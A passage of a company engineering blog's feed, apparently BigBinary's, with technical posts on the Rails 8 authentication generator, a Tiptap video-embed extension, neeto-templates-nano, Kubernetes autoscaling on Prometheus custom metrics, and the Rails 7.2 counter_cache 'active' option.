href="https://github.com/bcrypt-ruby/bcrypt-ruby">bcrypt</a> gem isadded to the Gemfile. If this gem is not present, it is added; if it iscommented, it is uncommented, and then <code>bundle install</code> is run to install thegem.</p></li></ul><h3>Authentication concern</h3><p>The core authentication logic and session management are encapsulated in the<a href="https://gist.github.com/neerajsingh0101/55593d0ba2d6b24fb3fd728aa94c3fb3#file-authentication-rb"><code>Authentication</code></a>concern.</p><ul><li><p><code>require_authentication</code>: This is a <code>before_action</code> callback which attempts torestore an existing session with <code>resume_session</code>. If no session is found, itredirects the user to the login page using <code>request_authentication</code>.</p></li><li><p><code>resume_session</code>: Retrieves a session using a signed token from the cookie viathe <code>find_session_by_cookie</code> method. Sets it as the current session, and savesthe token in a permanent, HTTP-only cookie using the <code>set_current_session</code>method.</p></li><li><p><code>authenticated?</code>: A helper method that checks if the current user has anactive session.</p></li><li><p><code>allow_unauthenticated_access</code>: This class method allows specific actions tobypass the <code>require_authentication</code> callback.</p></li><li><p><code>after_authentication_url</code>: Returns the URL to redirect to afterauthentication.</p></li><li><p><code>start_new_session_for(user)</code>: Creates a new session for the given user withdetails of the user's device and IP address and then sets the current session.</p></li><li><p><code>terminate_session</code>: Destroys the current session and removes the sessiontoken from cookies.</p></li></ul><h3>Managing sessions</h3><p>The<a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-sessions_controller-rb"><code>SessionsController</code></a>handles user session management and includes the following actions:</p><ul><li><p><code>new</code>: Renders a login form for the user credentials. The<a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-sessions_new-html-erb"><code>new.html.erb</code></a>file includes fields for email and password, displays flash messages forsuccess and errors, and provides a link for password recovery.</p></li><li><p><code>create</code>: Authenticates the user with the provided credentials. On success, itcreates a new session and redirects to the <code>after_authentication_url</code>; onfailure, it redirects to the login form with an error message.</p></li><li><p><code>destroy</code>: Terminates the users session and redirects to the login form.</p></li></ul><p>Combining all of this, a basic authentication flow would look like this.</p><p>&lt;br /&gt;</p><p><img src="/blog_images/2024/rails-8-introduces-a-basic-authentication-generator/user-authentication.png" alt="Flow of a basic authentication system"></p><p>&lt;br /&gt;</p><h3>Password reset functionality</h3><p>The basic password reset functionality includes initiating a password resetrequest, dispatching reset instructions via email, and updating the password.The<a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-passwords_controller-rb"><code>PasswordsController</code></a>manages these actions as follows:</p><ul><li><p><code>new</code>: Displays the form to request a password reset using the<a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-passwords_new-html-erb"><code>new.html.erb</code></a>template.</p></li><li><p><code>create</code>: Handles the reset request, sends a reset email via the<a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-passwords_mailer-rb"><code>PasswordMailer</code></a>if the user exists, and redirects with a notice. This email contains a link tothe password reset page, which includes a <code>password_reset_token</code> as aparameter. The <code>password_reset_token</code> is part of the<a href="https://github.com/rails/rails/pull/52483">newly added configuration</a> to<code>has_secure_password</code>. It has a default expiration period of 15 minutes.</p></li><li><p><code>edit</code>: Renders the<a href="https://gist.github.com/jaimysimon/c0cf64cd0c6e5ab8adb470acf90db38e#file-edit-html-erb"><code>edit.html.erb</code></a>template to set a new password.</p></li><li><p><code>update</code>: Updates the user's password, redirects on success, or shows an alerton failure.</p></li><li><p><code>set_user_by_token</code>: It is the <code>before_action</code> callback for the <code>edit</code> and<code>update</code> actions which retrieve the user based on the <code>password_reset_token</code>provided in the request parameters, ensuring proper identification of theuser.</p><p>Putting these together, the flow of resetting the password would be asfollows:</p></li></ul><p>&lt;br /&gt;</p><p><img src="/blog_images/2024/rails-8-introduces-a-basic-authentication-generator/password-reset.png" alt="Flow of password reset"></p><p>&lt;br /&gt;</p><h2>Current limitations and considerations</h2><p>The current authentication generator supports email-password login for existingusers but does not handle new account creation. Future updates may incorporateuser account creation and other customizations.</p><p>Please check out the following pull requests for more details:</p><ul><li>https://github.com/rails/rails/pull/52328</li><li>https://github.com/rails/rails/pull/52472</li><li>https://github.com/rails/rails/pull/52483</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Building custom extensions in Tiptap]]></title>
       <author><name>Gaagul C Gigi</name></author>
      <link href="https://www.bigbinary.com/blog/building-custom-extensions-in-tiptap"/>
      <updated>2024-08-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/building-custom-extensions-in-tiptap</id>
      <content type="html"><![CDATA[<p><a href="https://neeto-editor.neeto.com">neetoEditor</a> is a rich text editor used across<a href="https://neeto.com">neeto</a> products. It is built on Tiptap, an open-sourceheadless content editor, and offers a seamless and customizable solution forrich text editing.</p><p>The decision to use Tiptap as the foundational framework for neetoEditor isbased on its flexibility. Tiptap simplifies the complex Prosemirror syntax intosimple JavaScript classes. In this blog post, we'll walk you through the processof building an Embed extension using Tiptap.</p><h2>What is the Embed extension?</h2><p>&lt;div style=&quot;width:100%;max-width:600px;margin:auto;&quot;&gt;&lt;img width=&quot;100&quot; alt=&quot;embed-extension&quot; src=&quot;/blog_images/2024/building-custom-extensions-in-tiptap/embed-youtube-video.gif&quot;&gt;&lt;/div&gt;</p><p>&lt;br /&gt;</p><p>&lt;br /&gt;</p><p>The Embed extension enables embedding of videos from YouTube, Vimeo, Loom and<a href="https://neeto.com/neetorecord">NeetoRecord</a>.</p><h2>Implementation</h2><p>If you think of the document as a tree, every content type in Tiptap is a Node.Examples of nodes include paragraphs, headings, and code blocks. Here, we arecreating a new &quot;embed&quot; node.</p><pre><code class="language-jsx">import { Node } from &quot;@tiptap/core&quot;;export default Node.create({  name: &quot;embed&quot;, // A unique identifier for the Node  group: &quot;block&quot;, // Belongs to the &quot;block&quot; group of extensions  //...});</code></pre><h3>Attributes</h3><p><a href="https://tiptap.dev/docs/editor/guide/custom-extensions#attributes">Attributes</a>store extra information about a node and are rendered as HTML attributes bydefault. They are parsed from the content during initialization.</p><pre><code class="language-javascript">const Embed = Node.create({  //...  addAttributes() {    return {      src: { default: null },      title: { default: null },      frameBorder: { default: &quot;0&quot; },      allow: {        default:          &quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;,      },      allowfullscreen: { default: &quot;allowfullscreen&quot; },      figheight: {        default: 281,        parseHTML: element =&gt; element.getAttribute(&quot;figheight&quot;),      },      figwidth: {        default: 500,        parseHTML: element =&gt; element.getAttribute(&quot;figwidth&quot;),      },    };  },});</code></pre><p>These attributes customize the video embed behavior:</p><ul><li><strong>src</strong>: Specify the URL of the video you want to embed.</li><li><strong>title</strong>: Add additional information about the video (optional).</li><li><strong>frameBorder</strong>: Set to &quot;0&quot; for seamless integration (default).</li><li><strong>allow</strong>: Define various permissions for optimal video experience (defaultvalue provided).</li><li><strong>allowfullscreen</strong>: Enable fullscreen mode (default).</li><li><strong>figheight &amp; figwidth</strong>: Control the video frame's size.</li></ul><h3>Render HTML</h3><p>The<a href="https://Video.dev/docs/editor/guide/custom-extensions#render-html">renderHTML</a>function controls how an extension is rendered to HTML.</p><pre><code class="language-javascript">import { Node, mergeAttributes } from &quot;@tiptap/core&quot;;const Embed = Node.create({  //...  renderHTML({ HTMLAttributes, node }) {    const { figheight, figwidth } = node.attrs;    return [      &quot;div&quot;,      {        class: `neeto-editor__video-wrapper neeto-editor__video--${align}`,      },      [        &quot;div&quot;,        {          class: &quot;neeto-editor__video-iframe&quot;,          style: `width: ${figwidth}px; height: ${figheight}px;`,        },        [          &quot;iframe&quot;,          mergeAttributes(this.options.HTMLAttributes, {            ...HTMLAttributes,          }),        ],      ],    ];  },});</code></pre><p>This renders the following HTML content:</p><pre><code class="language-jsx">&lt;div class=&quot;neeto-editor__video-wrapper neeto-editor__video--center&quot;&gt;  &lt;div class=&quot;neeto-editor__video-iframe&quot; style=&quot;width: 281px;height: 500px&quot;&gt;    &lt;iframe      src=&quot;&lt;src of the embed&gt;&quot;      title=&quot;&lt;title of the embed&gt;&quot;      frameborder=&quot;0&quot;      allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;      allowfullscreen=&quot;allowfullscreen&quot;      figheight=&quot;281&quot;      figwidth=&quot;500&quot;      align=&quot;center&quot;    &gt;&lt;/iframe&gt;  &lt;/div&gt;&lt;/div&gt;</code></pre><h3>Parse HTML</h3><p>The<a href="https://tiptap.dev/docs/editor/guide/custom-extensions#parse-html">parseHTML</a>function loads the editor document from HTML by receiving an HTML DOM element asinput and returning an object with attributes and their values.</p><pre><code class="language-javascript">const Embed = Node.create({  //...  parseHTML() {    return [{ tag: &quot;iframe[src]&quot; }];  },});</code></pre><p>This ensures that whenever Tiptap encounters a <code>&lt;iframe&gt;</code> tag with an <code>src</code>attribute, our custom &quot;embed&quot; Node renders our custom UI.</p><h3>Commands</h3><p><a href="https://tiptap.dev/docs/editor/api/commands">Commands</a> help us to easily modifyor alter a selection programmatically. For our embed extension, let's write acommand to insert the embed node.</p><pre><code class="language-javascript">const Embed = Node.create({  //...  addCommands() {    return {      setExternalVideo:        options =&gt;        ({ commands }) =&gt;          commands.insertContent({ type: this.name, attrs: options }),    };  },});</code></pre><p>This is how a command can be executed:</p><pre><code class="language-javascript">editor  .setExternalVideo({ src: &quot;https://www.youtube.com/embed/3sQv3Xh3Gt4&quot; })  .run();</code></pre><h3>NodeView</h3><p>Node views in TipTap enable customization for interactive nodes in your editor.</p><p>You can learn more about Node views with React<a href="https://tiptap.dev/docs/editor/guide/node-views/react">here</a>.</p><p>This is how your node extension could look like:</p><pre><code class="language-jsx">import { Node } from &quot;@tiptap/core&quot;;import { ReactNodeViewRenderer } from &quot;@tiptap/react&quot;;import Component from &quot;./Component.jsx&quot;;export default Node.create({  // configuration   addNodeView() {    return ReactNodeViewRenderer(Component);  },});</code></pre><blockquote><p>Note: The <code>ReactNodeViewRenderer</code> passes a few very helpful props to yourcustom React component.</p></blockquote><p>This is how our Embed component looks like:</p><pre><code class="language-jsx">import React from &quot;react&quot;;import { NodeViewWrapper } from &quot;@tiptap/react&quot;;import { mergeRight } from &quot;ramda&quot;;import { Resizable } from &quot;re-resizable&quot;;import Menu from &quot;../Image/Menu&quot;;const EmbedComponent = ({  node,  editor,  getPos,  updateAttributes,  deleteNode,}) =&gt; {  const { figheight, figwidth, align } = node.attrs;  const { view } = editor;  let height = figheight;  let width = figwidth;  const handleResize = (_event, _direction, ref) =&gt; {    height = ref.offsetHeight;    width = ref.offsetWidth;    view.dispatch(      view.state.tr.setNodeMarkup(        getPos(),        undefined,        mergeRight(node.attrs, {          figheight: height,          figwidth: width,          height,          width,        })      )    );    editor.commands.focus();  };  return (    &lt;NodeViewWrapper      className={`neeto-editor__video-wrapper neeto-editor__video--${align}`}    &gt;      &lt;Resizable        lockAspectRatio        className=&quot;neeto-editor__video-iframe&quot;        size={{ height, width }}        onResizeStop={handleResize}      &gt;        &lt;Menu {...{ align, deleteNode, editor, updateAttributes }} /&gt; // Menu        component to handle alignment and delete        &lt;iframe {...node.attrs} /&gt;      &lt;/Resizable&gt;    &lt;/NodeViewWrapper&gt;  );};export default EmbedComponent;</code></pre><p>The <code>NodeViewWrapper</code> component is a wrapper for the custom component providedby TipTap. The <code>Resizable</code> component is used to resize the embed node.</p><h2>Putting it all together</h2><p>Here's the final output of the Embed extension in neetoEditor:</p><pre><code class="language-javascript">import { Node, mergeAttributes, PasteRule } from &quot;@tiptap/core&quot;;import { ReactNodeViewRenderer } from &quot;@tiptap/react&quot;;import { TextSelection } from &quot;prosemirror-state&quot;;import { COMBINED_REGEX } from &quot;common/constants&quot;;import EmbedComponent from &quot;./EmbedComponent&quot;;import { validateUrl } from &quot;./utils&quot;;export default Node.create({   name: &quot;embed&quot;  addOptions() {    return { inline: false, HTMLAttributes: {} };  },  inline() {    return this.options.inline;  },  group() {    return this.options.inline ? &quot;inline&quot; : &quot;block&quot;;  },  addAttributes() {    return {      src: { default: null },      title: { default: null },      frameBorder: { default: &quot;0&quot; },      allow: {        default:          &quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;,      },      allowfullscreen: { default: &quot;allowfullscreen&quot; },      figheight: {        default: 281,        parseHTML: element =&gt; element.getAttribute(&quot;figheight&quot;),      },      figwidth: {        default: 500,        parseHTML: element =&gt; element.getAttribute(&quot;figwidth&quot;),      },      align: {        default: &quot;center&quot;,        parseHTML: element =&gt; element.getAttribute(&quot;align&quot;),      },    };  },  parseHTML() {    return [{ tag: &quot;iframe[src]&quot; }];  },  renderHTML({ HTMLAttributes, node }) {    const { align, figheight, figwidth } = node.attrs;    return [      &quot;div&quot;,      {        class: `neeto-editor__video-wrapper neeto-editor__video--${align}`,      },      [        &quot;div&quot;,        {          class: &quot;neeto-editor__video-iframe&quot;,          style: `width: ${figwidth}px; height: ${figheight}px;`,        },        [          &quot;iframe&quot;,          mergeAttributes(this.options.HTMLAttributes, {            ...HTMLAttributes,          }),        ],      ],    ];  },  addNodeView() {    return ReactNodeViewRenderer(EmbedComponent);  },  addCommands() {    return {      setExternalVideo:        options =&gt;        ({ commands }) =&gt;          commands.insertContent({ type: this.name, attrs: options }),    };  },  addPasteRules() {    return [      new PasteRule({        find: COMBINED_REGEX,        handler: ({ state, range, match }) =&gt; {          state.tr.delete(range.from, range.to);          state.tr.setSelection(            TextSelection.create(state.doc, range.from + 1)          );          const validatedUrl = validateUrl(match[0]);          if (validatedUrl) {            const node = state.schema.nodes[&quot;embed&quot;].create({              src: validatedUrl,            });            state.tr.insert(range.from, node);            state.tr.insert(              range.from + node.nodeSize + 1,              state.schema.nodes.paragraph.create()            );            state.tr.setSelection(              TextSelection.create(state.tr.doc, range.from + node.nodeSize + 1)            );          }        },      }),    ];  },});</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Exploring management of templates across Neeto products using neeto-templates-nano]]></title>
       <author><name>Sooraj Bhaskaran</name></author>
      <link href="https://www.bigbinary.com/blog/how-build-neeto-templates-nano"/>
      <updated>2024-07-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-build-neeto-templates-nano</id>
      <content type="html"><![CDATA[<h2>Overview</h2><p><code>neeto-templates-nano</code> serves as an incredibly flexible and user-friendlytemplate builder within the Neeto ecosystem. In this blog post, we will explorethe evolution from previous approaches to the development of<strong>neeto-templates-nano</strong> and how it effectively addresses the challengesencountered.</p><h2>Evolution of templates at NeetoSite</h2><p><a href="https://www.neeto.com/neetosite">NeetoSite</a> is a website builder.</p><p>Before the advent of <code>neeto-templates-nano</code>, NeetoSite relied on three tables -<strong>templates_sites</strong>, <strong>templates_pages</strong>, and <strong>template_blocks</strong> to store site,page, and blocks data for templates. This structure duplicated the schemaalready employed in NeetoSite for sites, pages, and blocks, resulting inredundancy.</p><p>Another challenge arose with the storage of each template in a YAML file,necessitating a custom rake task for maintenance. Tasks like updating templates,such as changing font families, required laborious manual edits to every YAMLfile, affecting scalability and maintainability.</p><p>This <strong>YAML</strong> snippet portrays the complexity of maintaining templates. The needfor manual edits in each YAML file hampers scalability and maintainability.</p><pre><code class="language-yaml">## Example of a template in YAML formatname: Document Signerkeywords: &quot;E-signature, AI, Cost effective, Paperless&quot;pages:  - name: &quot;Home&quot;    url: &quot;/&quot;    blocks:      - name: &quot;header_with_logo_title&quot;        category: &quot;header&quot;        kind: &quot;header_with_logo_title&quot;        identifier: &quot;Header&quot;        configurations:          design:            body:              border:                borderColor: &quot;#FFFFFF&quot;                borderStyle: none                borderWidth: 0              backgroundColor: &quot;#FFFFFF&quot;              paddingVertical: 8              paddingHorizontal: 48            logo:              height: 52            links:              color: &quot;#1F2433&quot;              fontSize: &quot;1em&quot;              fontFamily: Lato              fontWeight: 500              letterSpacing: 0            buttons:              color: &quot;#ffffff&quot;              border:                borderColor: &quot;#f4620c&quot;                borderStyle: solid                borderWidth: 1              fontSize: &quot;0.875em&quot;              fontFamily: Open Sans              fontWeight: 500              borderRadius: 9999              letterSpacing: 0              backgroundColor: &quot;#f4620c&quot;            logoTitle:              color: &quot;#1F2433&quot;              fontSize: &quot;0.875em&quot;              fontFamily: Inter              fontWeight: 500              letterSpacing: 0            hamburgerMenu:              color: &quot;#000000&quot;          properties:            logo:              alt: Max Chat              url: &quot;#!&quot;              title: &quot;&quot;            links:              - to: &quot;#Clients&quot;                label: Clients                action: internal              - to: &quot;#Insights&quot;                label: Insights                action: internal            position: sticky            enableAnimation: true</code></pre><p>Recognizing these challenges, we opted for a more scalable and maintainablesolution.</p><h2>The neeto-templates-nano solution</h2><h3>Eliminating redundancy</h3><p>To streamline template creation and management, <strong>neeto-templates-nano</strong>introduces a comprehensive solution. It includes a frontend package,<a href="https://www.npmjs.com/package/@bigbinary/neeto-templates-frontend">@bigbinary/neeto-templates-frontend</a>,and a ruby gem, <strong>neeto-templates-engine</strong> (private gem).</p><h3>Architecture</h3><p>The architecture addresses redundancy by whitelisting the <code>templates</code>organization for template creation. Once a site is constructed from the<strong>templates</strong> organization and published, it becomes a template accessible fromother organizations.</p><p><img src="/blog_images/2024/how-build-neeto-templates-nano/architecture.png" alt="Architecture"></p><p>In this illustration, we've published 5 sites at <code>templates</code> organization of<a href="https://www.neeto.com/neetosite">NeetoSite</a>. After publication, the sitesbecome accessible to users across all organizations. Choosing any template willclone it from the <strong>templates</strong> organization to the user's organization. Thisstraightforward mechanism simplifies the management and sharing of templatesacross different organizations.</p><p>The <code>CreateTemplateModal</code> was exported from<code>@bigbinary/neeto-templates-frontend</code>, allows users to see and select templateswhen creating a new site.</p><p><img src="/blog_images/2024/how-build-neeto-templates-nano/create_templates_screen.gif" alt="CreateTemplateModal"></p><p>This GIF shows how simple it is to browse through available templates using the<code>CreateTemplateModal</code>. Users can preview templates, pick the one that suitstheir needs, and quickly start their projects without reinventing the wheel.</p><h3>Advantages of porting to neeto-templates-nano</h3><ol><li><p><strong>Effortless Template Management:</strong> With neeto-templates-nano, managingtemplates is a breeze. Administrators can easily add, update, or deletetemplates by accessing the templates organization and simply publishing thechanges. This streamlines the template lifecycle, ensuring that users alwayshave access to the latest versions.</p></li><li><p><strong>Enhanced Template Customization:</strong> neeto-templates-nano introduces newcustomizations that enable administrators to add tags and cover images fortemplates directly within the templates organization. This functionalityenhances the visual appeal of templates and facilitates better organizationand searchability. Administrators can tailor templates to specific projectrequirements, improving overall user experience and productivity.</p></li></ol><h3>Implementation across Neeto products</h3><p><strong>neeto-templates-nano</strong> has seamlessly integrated into<a href="https://www.neeto.com/neetoform">NeetoForm</a> and<a href="https://www.neeto.com/neetosite">NeetoSite</a>, offering a standardized approachto template management across all Neeto products.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring the Kubernetes Horizontal Pod Autoscaler to scale based on custom metrics from Prometheus]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/prometheus-adapter"/>
      <updated>2024-07-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/prometheus-adapter</id>
      <content type="html"><![CDATA[<p>Some of the major upsides of using Kubernetes to manage deployments are theself-healing and autoscaling capabilities of Kubernetes. If a deployment has asudden spike of traffic, Kubernetes will automatically spin up new containersand handle that load gracefully. It will also scale down deployments when thetraffic reduces.</p><p>Kubernetes has<a href="https://www.bigbinary.com/blog/solving-scalability-in-neeto-deploy#understanding-kubernetes-autoscalers">a couple of different ways</a>to scale deployments automatically based on the load the application receives.The<a href="https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/">Horizontal Pod Autoscaler (HPA)</a>can be used out of the box in a Kubernetes cluster to increase or decrease thenumber of Pods of your deployment. By default, HPA supports scaling based on CPUand memory usage, served by the<a href="https://kubernetes.io/docs/tasks/debug/debug-cluster/resource-metrics-pipeline/#metrics-server">metrics server</a>.</p><p>While building <a href="https://neeto.com/neetodeploy">NeetoDeploy</a> initially, we'd setup to scale deployments based on CPU and memory usage, since these were thedefault metrics supported by the HPA. However, later we wanted to scaledeployments based on the average response time of our application.</p><p>This is an example of a case where the metric we want to scale is not directlyrelated to the CPU or the memory usage. Other examples of this could be networkmetrics from the load balancer, like the number of requests received in theapplication. In this blog, we will discuss how we achieved autoscaling ofdeployments in Kubernetes based on the average response time using<a href="https://github.com/kubernetes-sigs/prometheus-adapter">prometheus-adapter</a>.</p><p>When an application receives a lot of requests suddenly, this creates a spike inthe average response time. The CPU and memory metrics also spike, but they takelonger to catch up. In such cases, being able to scale deployments based on theresponse time will ensure that the spike in traffic is handled gracefully.</p><p><a href="https://prometheus.io/">Prometheus</a> is one of the most popular cloud nativemonitoring tools and the Kubernetes HPA can be extended to scale deploymentsbased on metrics exposed by Prometheus. We used the <code>prometheus-adapter</code> tobuild autoscaling based on the average response time in<a href="https://neeto.com/neetodeploy">NeetoDeploy</a>.</p><h2>Setting up the custom metrics</h2><p>We took the following steps to make our HPAs work with Prometheus metrics.</p><ol><li>Installed <code>prometheus-adapter</code> in our cluster.</li><li>Configured the metric we wanted for our HPAs as a custom metric in the<code>prometheus-adapter</code>.</li><li>Confirmed that the metric is added to the <code>custom.metrics.k8s.io</code> APIendpoint.</li><li>Configured an HPA with the custom metric.</li></ol><h2>Install prometheus-adapter in the cluster</h2><p><a href="https://github.com/kubernetes-sigs/prometheus-adapter">prometheus-adapter</a> isan implementation of the <code>custom.metrics.k8s.io</code> API using Prometheus. We usedthe prometheus-adapter to set up Kubernetes metrics APIs for our Promtheusmetrics, which then can be used with our HPAs.</p><p>We installed <code>prometheus-adapter</code> in our cluster using <a href="https://helm.sh/">Helm</a>.We got a template for the values file for the Helm installation<a href="https://github.com/prometheus-community/helm-charts/blob/main/charts/prometheus-adapter/values.yaml">here</a>.</p><p>We made a few changes to the file before we applied it to our cluster anddeployed <code>prometheus-adapter</code>:</p><ol><li>We made sure that the Prometheus deployment is configured properly by givingthe correct service url and port.</li></ol><pre><code class="language-yaml"># values.yamlprometheus:  # Value is templated  url: http://prometheus.monitoring.svc.cluster.local  port: 9090  path: &quot;&quot;# ... rest of the file</code></pre><ol start="2"><li>We made sure that the custom metrics that we needed for our HPA areconfigured under <code>rules.custom</code> in the <code>values.yaml</code> file. In the followingexample, we are using the custom metric <code>traefik_service_avg_response_time</code>since we'll be using that to calculate the average response time for eachdeployment.</li></ol><pre><code class="language-yaml"># values.yamlrules:  default: false  custom:    - seriesQuery:'{__name__=~&quot;traefik_service_avg_response_time&quot;, service!=&quot;&quot;}'      resources:        overrides:          app_name:            resource: service          namespace:            resource: namespace      metricsQuery: traefik_service_avg_response_time{&lt;&lt;.LabelMatchers&gt;&gt;}</code></pre><p>Once we configured our <code>values.yaml</code> file properly, we installed<code>prometheus-adapter</code> in our cluster with Helm.</p><pre><code class="language-bash">helm repo add prometheus https://prometheus-community.github.io/helm-chartshelm repo updatehelm install prom-adapter prometheus-community/prometheus-adapter --values values.yaml</code></pre><h2>Query for custom metric</h2><p>Once we got <code>prometheus-adapter</code> running, we queried our cluster to check if thecustom metric is coming up in the <code>custom.metrics.k8s.io</code> API endpoint.</p><pre><code class="language-bash">kubectl get --raw /apis/custom.metrics.k8s.io/v1beta1 | jq</code></pre><p>The response looked like this:</p><pre><code class="language-json">{  &quot;kind&quot;: &quot;APIResourceList&quot;,  &quot;apiVersion&quot;: &quot;v1&quot;,  &quot;groupVersion&quot;: &quot;custom.metrics.k8s.io/v1beta1&quot;,  &quot;resources&quot;: [    {      &quot;name&quot;: &quot;services/traefik_service_avg_response_time&quot;,      &quot;singularName&quot;: &quot;&quot;,      &quot;namespaced&quot;: true,      &quot;kind&quot;: &quot;MetricValueList&quot;,      &quot;verbs&quot;: [&quot;get&quot;]    },    {      &quot;name&quot;: &quot;namespaces/traefik_service_avg_response_time&quot;,      &quot;singularName&quot;: &quot;&quot;,      &quot;namespaced&quot;: false,      &quot;kind&quot;: &quot;MetricValueList&quot;,      &quot;verbs&quot;: [&quot;get&quot;]    }  ]}</code></pre><p>We also queried the metric API for a particular service we've configured themetric for. Here, we're querying the <code>traefik_service_avg_response_time</code> metricfor the <code>neeto-chat-web-staging</code> app in the default namespace.</p><pre><code>kubectl get --raw /apis/custom.metrics.k8s.io/v1beta1/namespaces/default/services/neeto-chat-web-staging/traefik_service_avg_response_time | jq</code></pre><p>The API response gave the following.</p><pre><code class="language-json">{  &quot;kind&quot;: &quot;MetricValueList&quot;,  &quot;apiVersion&quot;: &quot;custom.metrics.k8s.io/v1beta1&quot;,  &quot;metadata&quot;: {},  &quot;items&quot;: [    {      &quot;describedObject&quot;: {        &quot;kind&quot;: &quot;Service&quot;,        &quot;namespace&quot;: &quot;default&quot;,        &quot;name&quot;: &quot;neeto-chat-web-staging&quot;,        &quot;apiVersion&quot;: &quot;/v1&quot;      },      &quot;metricName&quot;: &quot;traefik_service_avg_response_time&quot;,      &quot;timestamp&quot;: &quot;2024-02-26T19:31:33Z&quot;,      &quot;value&quot;: &quot;19m&quot;,      &quot;selector&quot;: null    }  ]}</code></pre><p>From the response, we can see that the average response time at the instant isreported as <code>19ms</code>.</p><h2>Create the HPA</h2><p>Now that we're sure that <code>prometheus-adapter</code> is able to serve custom metricsunder the <code>custom.metrics.k8s.io</code> API, we wired this up with a Horizontal PodAutoscaler to scale our deployments based on our custom metric.</p><pre><code class="language-yaml">apiVersion: autoscaling/v2kind: HorizontalPodAutoscalermetadata:  name: my-app-name-hpaspec:  scaleTargetRef:    apiVersion: apps/v1    kind: Deployment    name: my-app-name-deployment  minReplicas: 1  maxReplicas: 10  metrics:    - type: Object      object:        metric:          name: traefik_service_avg_response_time          selector: { matchLabels: { app_name: my-app-name } }        describedObject:          apiVersion: v1          kind: Service          name: my-app-name        target:          type: Value          value: 0.03</code></pre><p>With everything set up, the HPA was able to fetch the custom metric scraped byPrometheus and scale our Pods up and down based on the value of the metric. Wealso created a recording rule in Prometheus for storing our custom metricqueries and dropped the unwanted labels as a best practice. We can use thecustom metric stored with the recording rule directly with <code>prometheus-adapter</code>to expose the metrics as an API endpoint in Kubernetes. This is helpful whenyour custom metric queries are complex.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. If you want to give NeetoDeploy a try, then please send us an email atinvite@neeto.com.</p><p>If you have questions about NeetoDeploy or want to see the journey, followNeetoDeploy on <a href="https://twitter.com/neetodeploy">X</a>. You can also join our<a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about anyNeeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.2 makes counter_cache integration safer and easier]]></title>
       <author><name>Navaneeth D</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-adds-ability-to-ignore-counter_cache-column-while-backfilling"/>
      <updated>2024-07-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-adds-ability-to-ignore-counter_cache-column-while-backfilling</id>
      <content type="html"><![CDATA[<p>Counter caches are a cornerstone of performance optimization in Railsapplications. They efficiently keep track of the number of associated recordsfor a model, eliminating the need for frequent database queries. However, addingcounter caches to existing applications, especially those with large tables,often can be challenging. Rails 7.2 brings an exciting update to address justthat!</p><h2>Counter cache integration challenges</h2><p>When introducing counter caches to large datasets, developers often encountertwo primary challenges:</p><ul><li>Backfilling data efficiently: Adding a counter cache column to an existingtable with a substantial amount of data can be problematic. Backfilling thecounter cache values separately from the column addition is necessary toprevent prolonged table locks, which can significantly impact applicationperformance. This process requires careful consideration to ensure dataintegrity while minimizing downtime and avoiding disruptions to userexperience.</li><li>Ensuring data consistency: Once the counter cache is in place, maintainingdata consistency becomes paramount. Methods such as <code>size</code>, <code>any?</code>, and othersthat utilize counter caches internally must return accurate results. However,during the backfilling process, relying solely on the counter cache mayproduce incorrect counts until all records are appropriately updated.</li></ul><h2>Safer counter cache implementation in Rails 7.2</h2><p>The new update in Rails 7.2 introduces a feature that allows developers tomanage counter caches more effectively, especially in scenarios involvingexisting large datasets. By introducing the <code>active</code> option in the counter cacheconfiguration, developers can control when the counter cache is activelyutilized. This enables them to backfill counter cache columns separately fromtheir addition, minimizing table locks and potential performance issues. Oncethe backfilling process is complete, developers can activate the counter cache,ensuring accurate association counts without compromising applicationperformance.</p><p>Let's illustrate the implementation of this update in Rails using astraightforward example involving a blog application with articles and comments.In our blog application, each article can have multiple comments. We want to adda counter cache to track the number of comments associated with each article.However, our database already contains a significant amount of data, makingtraditional counter cache implementation challenging.</p><h3>Implementation Steps</h3><ol><li>Define the association: Initially, we define the association between the<code>Article</code> model and the <code>Comment</code> model, specifying the counter cache withthe <code>active: false</code> option to keep it inactive during the initial setup.</li></ol><pre><code class="language-ruby">class Comment &lt; ApplicationRecord  belongs_to :article, counter_cache: { active: false }end</code></pre><ol start="2"><li><p>Backfill the Counter Cache: With the association configured, we proceed tobackfill the counter cache column in the <code>articles</code> table. During this phase,the counter cache remains inactive, and methods like <code>size</code>, <code>any?</code>, etc.,retrieve results <strong>directly from the database</strong>. This prevents incorrectvalues from getting displayed during backfilling.</p></li><li><p>Activate the Counter Cache: Once the backfilling process is complete, weactivate the counter cache by removing the <code>active: false</code> option from thecounter cache definition.</p></li></ol><pre><code class="language-ruby">class Comment &lt; ApplicationRecord  belongs_to :article, counter_cache: trueend</code></pre><p>Upon activation, the counter cache integrates into the association, efficientlytracking the number of comments associated with each article.</p><p>This <a href="https://github.com/rails/rails/pull/51453">PR introduced</a> active option.Checkout full feature discussion<a href="https://discuss.rubyonrails.org/t/new-feature-to-make-introducing-counter-caches-safer-and-easier/85456">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we fixed app downtime issue in NeetoDeploy]]></title>
       <author><name>Abhishek T</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-fixed-app-down-time-in-neeto-deploy"/>
